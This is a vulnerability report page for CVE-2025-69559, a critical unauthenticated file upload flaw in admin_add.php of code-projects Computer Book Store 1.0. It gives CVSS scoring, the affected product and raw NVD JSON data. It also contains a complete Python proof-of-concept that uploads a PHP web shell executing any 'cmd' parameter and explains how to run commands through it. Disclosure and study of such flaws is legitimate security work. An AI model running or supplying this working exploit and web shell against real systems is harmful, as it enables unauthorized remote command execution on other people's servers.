Security Vulnerability Report
中文
CVE-2025-69559 CVSS 9.8 CRITICAL

CVE-2025-69559

Published: 2026-01-27 17:16:10
Last Modified: 2026-02-03 14:50:36

Description

code-projects Computer Book Store 1.0 is vulnerable to File Upload in admin_add.php.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:carmelo:computer_book_store:1.0:*:*:*:*:*:*:* - VULNERABLE
code-projects Computer Book Store 1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 # CVE-2025-69559 PoC - File Upload in admin_add.php # Target: code-projects Computer Book Store 1.0 import requests import sys def exploit(target_url): """ Exploit file upload vulnerability in admin_add.php """ # Prepare malicious PHP file (WebShell) webshell_content = '<?php if(isset($_REQUEST["cmd"])){ system($_REQUEST["cmd"]); } ?>' # Prepare multipart form data files = { 'file': ('shell.php', webshell_content, 'application/x-php') } # Send upload request upload_url = f'{target_url}/admin_add.php' try: response = requests.post(upload_url, files=files, timeout=10) if response.status_code == 200: print('[+] File uploaded successfully') print('[+] WebShell location: ' + upload_url.replace('admin_add.php', 'uploads/shell.php')) print('[+] Use ?cmd=<command> to execute commands') else: print('[-] Upload failed') except requests.exceptions.RequestException as e: print(f'[-] Error: {e}') if __name__ == '__main__': if len(sys.argv) != 2: print(f'Usage: python3 {sys.argv[0]} <target_url>') sys.exit(1) target = sys.argv[1].rstrip('/') exploit(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-69559", "sourceIdentifier": "[email protected]", "published": "2026-01-27T17:16:09.760", "lastModified": "2026-02-03T14:50:35.967", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "code-projects Computer Book Store 1.0 is vulnerable to File Upload in admin_add.php."}, {"lang": "es", "value": "code-projects Computer Book Store 1.0 es vulnerable a carga de archivos en admin_add.PHP."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-434"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:carmelo:computer_book_store:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "546965A8-2492-49F6-9BA4-11004234E336"}]}]}], "references": [{"url": "https://gist.github.com/lih28984-commits/cd3a275dfd9c92a79b6a4a0e8801f4fa", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://gitee.com/Z_180yc/zyy/issues/IDBY27", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}